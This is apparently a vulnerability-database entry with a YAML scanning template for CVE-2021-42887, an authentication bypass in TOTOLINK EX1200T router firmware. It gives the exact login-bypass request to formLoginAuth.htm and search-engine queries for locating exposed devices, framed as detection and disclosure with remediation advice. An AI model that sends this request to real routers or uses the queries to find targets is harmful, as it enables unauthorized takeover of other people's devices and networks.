CVE-2021-42887: TOTOLINK EX1200T 4.1.2cu.5215 - Authentication Bypass

日期: 2025-08-01 | 影响软件: TOTOLINK EX1200T 4.1.2cu.5215 | POC: 已公开

漏洞描述

TOTOLINK EX1200T 4.1.2cu.5215 is susceptible to authentication bypass. An attacker can bypass login by sending a specific request through formLoginAuth.htm, thus potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.

PoC代码[已公开]

id: CVE-2021-42887

info:
  name: TOTOLINK EX1200T 4.1.2cu.5215 - Authentication Bypass
  author: gy741
  severity: critical
  description: |
    TOTOLINK EX1200T 4.1.2cu.5215 is susceptible to authentication bypass. An attacker can bypass login by sending a specific request through formLoginAuth.htm, thus potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to the device, potentially leading to further compromise of the network.
  remediation: |
    Apply the latest firmware update provided by TOTOLINK to fix the authentication bypass vulnerability.
  reference:
    - https://github.com/p1Kk/vuln/blob/main/totolink_ex1200t_login_bypass.md
    - https://nvd.nist.gov/vuln/detail/cve-2021-42887
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-42887
    cwe-id: CWE-287
    epss-score: 0.59972
    epss-percentile: 0.98215
    cpe: cpe:2.3:o:totolink:ex1200t_firmware:4.1.2cu.5215:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: totolink
    product: ex1200t_firmware
    shodan-query:
      - title:"TOTOLINK"
      - http.title:"totolink"
    fofa-query: title="totolink"
    google-query: intitle:"totolink"
  tags: cve2021,cve,totolink,auth-bypass,router

http:
  - raw:
      - |
        GET /login.htm HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /formLoginAuth.htm?authCode=1&userName=admin&goURL=&action=login HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - "TOTOLINK"

      - type: word
        part: header_2
        words:
          - "Set-Cookie: SESSION_ID="

      - type: status
        status:
          - 302
# digest: 490a00463044022052174394a95a92f7142a2f5dca9bd030baa40e1079813cb31649236cc270fb11022044270db6ddd1e011d076ffb7e193e41a0aa5a18ef7d052111b62e26f1d1abfe2:922c64590222798bb761d5b6d8e72950

相关漏洞推荐